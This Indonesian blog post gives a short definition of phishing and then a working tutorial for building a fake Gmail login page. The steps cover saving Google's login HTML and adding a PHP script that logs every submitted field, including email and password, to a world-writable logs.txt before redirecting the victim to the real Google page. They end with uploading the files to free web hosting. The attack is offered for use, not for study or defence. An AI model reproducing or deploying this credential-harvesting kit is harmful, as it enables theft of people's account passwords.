Skip to main content

PHISING DAN CONTOH CARA MEMBUAT PHISING PAGE

Phising merupakan kata plesetan dari bahasa Inggris yang berarti memancing. Dalam dunia yang serba terhubung secara elektronik saat ini, istilah phising banyak diartikan sebagai suatu cara untuk memancing seseorang ke halaman tertentu.
Phising tidak jarang digunakan oleh para pelaku kriminal di internet untuk memancing seseorang agar mendatangi alamat web melalui e-mail, salah satu tujuannya adalah untuk menjebol informasi yang sangat pribadi dari sang penerima email, seperti password, kartu kredit, dll.
Diantaranya dengan mengirimkan informasi yang seakan-akan dari penerima e-mail mendapatkan pesan dari sebuah situs, lalu mengundangnya untuk mendatangi sebuah situs palsu. Situs palsu dibuat sedemikian rupa yang penampilannya mirip dengan situs asli. lalu ketika korban mengisikan password maka pada saat itulah penjahat ini mengetahui password korban. Penggunaan situs palsu ini disebut juga dengan istilah pharming.

Contoh: Membuat Gmail Phising Page
Step 1.
a. Buka website http://gmail.com
b. Klik File > Save Page As (ctrl + s)
  
c. Setelah Anda simpan, ubah nama ServiceLogin.htm menjadi index.htm.

Step 2.
a. Buka notepad dan copy paste script berikut.
PHP Code:
<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle fopen("logs.txt""a");
foreach($_POST as $variable => $value) {
   fwrite($handle$variable);
   fwrite($handle"=");
   fwrite($handle$value);
   fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
exit;
?>
Save it as mail.php
b. Buka notepad dan copas script berikut:
ltmpl=default
ltmplcache=2
continue=http://mail.google.com/mail/?
service=mail
rm=false
Email=victim@gmail.com
Passwd=victimpassword
rmShown=1
signIn=Sign in
Save as logs.txt

Step 3.
a. Open Index.htm dengan notepad dan cari script berikut:
Ganti script tersebut dengan script berikut ini:
<form id="gaia_loginform" action="mail.php" method="post"

Step 4.
a. Sekarang kita mempunyai 4 files
b. Upload semua file tersebut ke webhosting (yang gratisan jg bolehhhh) dan jangan lupa chmod "logs.txt" adalah 777

Sekian semoga ini bermanfaat.

Salam.
Labels:

Comments

Post a Comment

Popular posts from this blog

DOMAIN (dot)asia HANYA AUD $1

  Di hari ulang tahun nya website Crazydomains yang ke 12 tahun,  crazydomains memberikan paket penawaran harga domain dengan TLD ( Top Level Domains ) (dot)asia hanya dengan seharga AUD $1 ( satu dollar australia ). Tentu saja kurs dollar australia lebih murah di bandingkan kurs dollar amerika. Untuk mendapatkan domain murah (dot)asia ini anda bisa membayarnya dengan menggunakan balance paypal. Dan yang pastinya anda tidak perlu mengisi atau mengharuskan memberi informasi tentang kartu kredit segala macem. Selain memberikan layanan untuk pemesanan nama domain, Crazydomains juga menyediakan sejumlah layanan lainnya, di antaranya adalah layanan Award Winning Logo Design, Cheap SSL Certificates, Professional Web Design, Build Your Own Website, Linux Dedicated Servers, Windows Dedicated Servers, Microsoft Email Exchange, Search Engine Submission dan Fax by Email. Untuk nama domain dengan harga paling murah dan harga ini bukan harga promo, yaitu domain (dot)mao...
Post a Comment
Read more

SCAN VIRUS DENGAN NETSTAT

Hi... All.. Langsung aja ke penjelasan yach... Berikut adalah Langkah-langkah nya: 1. Buka Task Manager (ctrl + alt + del) 2. Klik View dan Pilih Select Columns
Post a Comment
Read more